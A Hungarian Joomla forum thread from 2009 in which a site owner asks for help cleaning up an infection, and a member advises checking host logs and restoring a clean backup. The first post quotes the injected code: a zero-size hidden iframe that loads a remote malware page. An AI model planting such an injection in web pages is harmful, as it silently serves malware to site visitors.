Sziasztok!
Sikerült a gépemen rejtőzködő trójai ló miatt az oldalamra is egy fertőzést bekapni. Az index.php végére beirt egy sort:
iframe frameborder="0" onload="if (!this.src){ this.src='http://zria.ru/index.php'; this.height='0'; this.width='0';}" >xuycfsskfmsftmajfpwceyldcolvuvd</iframe
Onnan kiszedtem, a főoldallal nincs is gond. De minden egyéb oldalon, ahol cikkek vannak, fertőzést mutat a virusirtóm. Érdekes, hogy ahol pl. kereső vagy fűző van ott nincs jelzés. Hogyan lehetne eltávolitani valahogyan az egészet? Gondolom minden index.php-ba bekerült vagy nem tudom...
Fertőzött weboldal
5 hozzászólás
• Oldal: 1 / 1
Fertőzött weboldal
Szerző: owon » 2009.11.05. 20:43
- owon
- Hozzászólások: 195
- Csatlakozott: 2009.01.08. 15:44
- Adott: 14 köszönetet
- Kapott: 3 köszönetet
Re: Fertőzött weboldal
Szerző: joomlafan » 2009.11.05. 21:12
Tulajdonképpen manapság egy kedvelt támadási mód ez. A háttérben egy fájl gondoskodik a kódok beírásáról, rosszabb esetben már régen az egész oldalt adatbázissal együtt feltörték csak te még erről nem tudsz. Nagyon nézd végig az egész oldalt és javaslom a log fájlok tanulmányozását.
Joomla Fan Club
-
joomlafan - Hozzászólások: 1479
- Csatlakozott: 2008.12.30. 23:56
- Adott: 9 köszönetet
- Kapott: 360 köszönetet
Re: Fertőzött weboldal
Szerző: owon » 2009.11.05. 21:55
Szia!
Minden index.php fájlba beirta az iframe-s részt. Kikerestem az összeset és kitöröltem mindenhonnan. Szerencsére "csak" 74 fájl volt.
Honnan tudom meg, hogy fel-e törték az oldalt esetleg az adatbázist, valamit mire gondoltál a log fájlok tanulmányozása alatt? Mit keressek, mire figyeljek?
Köszi!
update: feltöltöttem az összes index.php-t amiben már nincs az iframe, de ennek ellenére se jó. Ugyan olyan hibát dob. Mit kezdjek, esetleg feltöltsek egy régebbi tárhelymentést?
Minden index.php fájlba beirta az iframe-s részt. Kikerestem az összeset és kitöröltem mindenhonnan. Szerencsére "csak" 74 fájl volt.
Honnan tudom meg, hogy fel-e törték az oldalt esetleg az adatbázist, valamit mire gondoltál a log fájlok tanulmányozása alatt? Mit keressek, mire figyeljek?
Köszi!
update: feltöltöttem az összes index.php-t amiben már nincs az iframe, de ennek ellenére se jó. Ugyan olyan hibát dob. Mit kezdjek, esetleg feltöltsek egy régebbi tárhelymentést?
- owon
- Hozzászólások: 195
- Csatlakozott: 2009.01.08. 15:44
- Adott: 14 köszönetet
- Kapott: 3 köszönetet
Re: Fertőzött weboldal
Szerző: joomlafan » 2009.11.06. 08:35
Ha van mentésed és tiszta, akkor mindenképpen célszerű felülírni a fájlokat.
A log fájlokat általában a szolgáltató készíti. Itt megtudod nézni, hogy valaki belépet e a tárterületre és mikor. Azt is megtudod nézni, hogy az index.php fájl tartalmát ki és mikor módosította. Innen el tudsz indulni a javítás irányába, ill. a fertőzést megtudod szüntetni.
A log fájlokat általában a szolgáltató készíti. Itt megtudod nézni, hogy valaki belépet e a tárterületre és mikor. Azt is megtudod nézni, hogy az index.php fájl tartalmát ki és mikor módosította. Innen el tudsz indulni a javítás irányába, ill. a fertőzést megtudod szüntetni.
Joomla Fan Club
-
joomlafan - Hozzászólások: 1479
- Csatlakozott: 2008.12.30. 23:56
- Adott: 9 köszönetet
- Kapott: 360 köszönetet
Re: Fertőzött weboldal
Szerző: owon » 2009.11.06. 09:30
Szia!
Szerencsére sikerült kiszedni a fertőzést minden érintett fájlból. Eltartott egy darabig, volt vagy 800-1000 fájl. Nagyon sok helyre befűzte, minden index.php,html továbbá még sok .php fájlba is.
A log fájloknak utánanézek, megpróbálok mindent ellenőrizni.
Köszönöm a segitséget!
Szerencsére sikerült kiszedni a fertőzést minden érintett fájlból. Eltartott egy darabig, volt vagy 800-1000 fájl. Nagyon sok helyre befűzte, minden index.php,html továbbá még sok .php fájlba is.
A log fájloknak utánanézek, megpróbálok mindent ellenőrizni.
Köszönöm a segitséget!
- owon
- Hozzászólások: 195
- Csatlakozott: 2009.01.08. 15:44
- Adott: 14 köszönetet
- Kapott: 3 köszönetet
5 hozzászólás
• Oldal: 1 / 1
Ki van itt
Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 0 vendég